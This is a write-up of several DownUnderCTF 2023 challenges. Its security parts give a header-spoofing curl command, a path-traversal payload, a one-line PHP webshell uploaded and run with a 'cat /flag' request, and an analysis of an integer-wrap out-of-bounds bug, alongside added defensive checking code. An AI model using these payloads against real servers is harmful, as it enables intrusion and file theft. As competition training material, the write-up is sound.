DownUnderCTF 2023

Proxed

Reading the source code shows that we need to add the header X-Forwarded-For: 31.33.33.7 to the request. Then refresh to get the flag.

Solve script:

#!/usr/bin/env bash
curl -H "X-Forwarded-For: 31.33.33.7" http://proxed.duc.tf:30019/;
echo

Discord

The flag is the first character of every word in the sentence at the final second of the video in #rules.

𝕏

There are 12 pictures in total, each holding a part of the flag. Gathering all of them, we have:

DUCTF{ Tha nksE l0nW tter eCantC all1t TheTw1 Fl4g N0w}

Since "Wtter" is not a valid word, after correcting it I get:

DUCTF{ThanksEl0nWeCantCall1tTheTw1tterFl4gN0w}

Welcome to DUCTF!

After flipping the upside-down text back, we got:

You've heard of C++ but can I introduce you to the better, faster, more profanity inclusive Aussie Plus Plus.

Featuring fantastic features like, Hard Yakka, YEAH NAH!, Going WALkAbOUT and I rECkON you can GIMME. Just take this code here and run it through the interpreter and it'll print you out the flag!

Aussie Plus Plus is actually a real programming language; paste the snippet from the attached file into this site and execute it to get the flag.

static file server

Just HTML-encode the relative path (../../../../flag.txt) and use it in the request.
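As an added example (my own code, not the writeup's or the challenge's), here is the check a static file server would need in order to refuse this request: decode the path once, then walk it segment by segment and reject any path whose ".." components would climb above the document root. It assumes a hypothetical server that percent-decodes the request path exactly once before mapping it to a file, and it also goes a little beyond the page by handling encoded separators, a decoded NUL byte, and malformed escapes.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge's code: a document-root escape check for a
   static file server. Assumes the (hypothetical) server percent-decodes the
   request path exactly once before mapping it to a file. */

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %XX escapes from src into dst (capacity dstlen). Returns 1 on
   success, 0 on a malformed escape, a decoded NUL byte, or overflow. */
int percent_decode(const char *src, char *dst, size_t dstlen) {
    size_t j = 0;
    for (size_t i = 0; src[i] != '\0'; i++) {
        if (j + 1 >= dstlen) return 0;            /* no room for byte + NUL */
        if (src[i] == '%') {
            int hi = hexval((unsigned char)src[i + 1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[i + 2]);
            if (hi < 0 || lo < 0) return 0;       /* "%zz", "%2", or "%" at end */
            int c = hi * 16 + lo;
            if (c == 0) return 0;                 /* %00 would truncate the path */
            dst[j++] = (char)c;
            i += 2;
        } else {
            dst[j++] = src[i];
        }
    }
    dst[j] = '\0';
    return 1;
}

/* Returns 1 if the decoded path never leaves the document root, 0 otherwise.
   A depth counter tracks how many directories deep we are; a ".." that would
   take depth below zero is an escape such as ../../../../flag.txt. */
int path_is_safe(const char *raw) {
    char decoded[1024];
    if (!percent_decode(raw, decoded, sizeof decoded)) return 0;
    if (strchr(decoded, '\\') != NULL) return 0;  /* refuse backslash separators */

    int depth = 0;
    const char *p = decoded;
    while (*p != '\0') {
        const char *start = p;
        while (*p != '\0' && *p != '/') p++;
        size_t len = (size_t)(p - start);
        if (*p == '/') p++;                       /* skip the separator */
        if (len == 0 || (len == 1 && start[0] == '.')) continue;  /* "//" or "." */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (--depth < 0) return 0;            /* climbed above the root */
        } else {
            depth++;
        }
    }
    return 1;
}

int main(void) {
    /* constructed sample requests, not taken from the challenge */
    const char *samples[] = {
        "/index.html", "css/../main.css", "../../../../flag.txt",
        "%2e%2e%2f%2e%2e%2fflag.txt", "static/..%2f..%2fflag.txt", "a%00.txt"
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-32s -> %s\n", samples[i], path_is_safe(samples[i]) ? "serve" : "reject");
    return 0;
}
```

The check is deliberately done on the decoded string rather than by string-matching "../" in the raw request, which is exactly the comparison an encoded payload slips past.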

blinkybill

Listening to the attachment, I know this is definitely Morse code, but I am unable to use an online Morse code translator since there is some background music. Viewing this file's spectrogram in Audacity, I got:

At this point, the short dash is a dot and the longer one is a hyphen. Translating that gives the flag.

downunderflow

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define USERNAME_LEN 6
#define NUM_USERS 8
/* index 7 is "admin"; the bound passed to read_int_lower_than() below is meant to keep it unreachable */
char logins[NUM_USERS][USERNAME_LEN] = { "user0", "user1", "user2", "user3", "user4", "user5", "user6", "admin" };

void init() {
    setvbuf(stdout, 0, 2, 0);   /* 2 == _IONBF: unbuffered I/O */
    setvbuf(stdin, 0, 2, 0);
}

/* only the upper bound is checked; negative values pass straight through */
int read_int_lower_than(int bound) {
    int x;
    scanf("%d", &x);
    if(x >= bound) {
        puts("Invalid input!");
        exit(1);
    }
    return x;
}

int main() {
    init();

    printf("Select user to log in as: ");
    /* the int is narrowed into an unsigned short, wrapping negatives modulo 65536 */
    unsigned short idx = read_int_lower_than(NUM_USERS - 1);
    printf("Logging in as %s\n", logins[idx]);
    if(strncmp(logins[idx], "admin", 5) == 0) {
        puts("Welcome admin.");
        system("/bin/sh");
    } else {
        system("/bin/date");
    }
}

The vulnerability is scanf("%d", &x): the int data type has the limit of [-2147483647, 2147483647], and read_int_lower_than() only rejects values at or above the bound, so any negative number is accepted. That negative int is then stored in the unsigned short idx, which wraps it into the 0..65535 range and lets it index logins[] outside the users the bound was meant to allow.
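To make the two halves of that explanation concrete, here is an added example (my own code, not the challenge's solve script): the challenge's one-sided check next to a hardened one, and a helper that shows what the conversion to unsigned short does to a negative input. The function names are mine; NUM_USERS matches the challenge source.

```c
#include <stdio.h>
#include <stddef.h>

#define NUM_USERS 8

/* Added example, not the challenge's code. Function names are assumptions. */

/* Same test the challenge applies: only the upper bound is checked, so every
   negative int is accepted. */
int weak_check_accepts(int x, int bound) {
    return x < bound;
}

/* What `unsigned short idx = read_int_lower_than(...)` does with the value:
   C converts an out-of-range int to unsigned short modulo 65536, so a negative
   number lands somewhere in 0..65535, not where the bound check assumed. */
unsigned short as_index(int x) {
    return (unsigned short)x;
}

/* Hardened check: reject negatives as well, so the value that reaches the
   array is provably in [0, bound). Keeping idx as an int, or checking after
   the narrowing conversion, closes the same hole. */
int strict_check_accepts(int x, int bound) {
    return x >= 0 && x < bound;
}

/* 1 if input x gets past the weak check yet indexes outside logins[]. */
int weak_check_lets_oob_through(int x) {
    return weak_check_accepts(x, NUM_USERS - 1) && as_index(x) >= NUM_USERS;
}

int main(void) {
    int probes[] = { 3, 7, -1, -65536 };   /* constructed inputs */
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int x = probes[i];
        printf("input %7d: weak=%s strict=%s idx=%u\n", x,
               weak_check_accepts(x, NUM_USERS - 1) ? "accept" : "reject",
               strict_check_accepts(x, NUM_USERS - 1) ? "accept" : "reject",
               (unsigned)as_index(x));
    }
    return 0;
}
```

The -1 probe shows the out-of-bounds read (index 65535 on an 8-entry array); the -65536 probe shows that a negative value can also wrap to a perfectly valid slot, which is why the fix has to reject the sign, not just the magnitude.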

The solve script:

xxd-server

Some valuable information in the source code:

  • PHP files are executable

# Everything not a PHP file, should be served as text/plain
<FilesMatch "\.(?!(php)$)([^.]*)$">
    ForceType text/plain
</FilesMatch>
  • Everything we upload is preserved; no filtering or sanitization happens.

So I just need to upload a PHP webshell to interact with the server; however, if the payload is too long (exceeding one line of the xxd CLI output), it causes an error.

My payload:

<?=`$_GET[0]`;?>

# XXD result
# 00000000: 3c3f 3d60 245f 4745 545b 305d 603b 3f3e  <?=`$_GET[0]`;?>
# 00000010: 0a

After that, interact with server:

teebow1e@teebow1e:/mnt/c/Users/teebow1e$ curl https://web-xxd-server-2680de9c070f.2023.ductf.dev/uploads/b1596a24046084d8/a.php?0=cat+/flag

00000000: 3c3f 3d60 245f 4745 545b 305d 603b 3f3e  DUCTF{00000000__7368_656c_6c64_5f77_6974_685f_7878_6421__shelld_with_xxd!}00000010: 0a

helpless

Basically, the help() interface is the less binary, so when I pressed H, I got the manual page. Inside, it shows that :e reads a file. So I can easily read the flag.

Solve script:


Make sure to smash your keyboard in a restricted environment; you may find a special interaction!

needle in iam

It appears that the credentials.json file and the given command both refer to the Google Cloud CLI. I installed it, then authenticated with the credentials file using this command:

gcloud auth login --cred-file=credentials.json

Using gcloud iam roles describe ComputeOperator --project=needle-in-iam, I can confirm that this account does not have enough permissions; however, I can list all roles in this project and then grep for the flag.

teebow1e@teebow1e:~$ gcloud iam roles list --project=needle-in-iam | grep DUCTF
description: DUCTF{D3scr1be_L1ST_Wh4ts_th3_d1fference_FDyIMbnDmX}

pyny

Since I am unable to understand what is happening, and unable to compile it into a single binary to reverse, I decided to attach gdb to the running Python scripts.
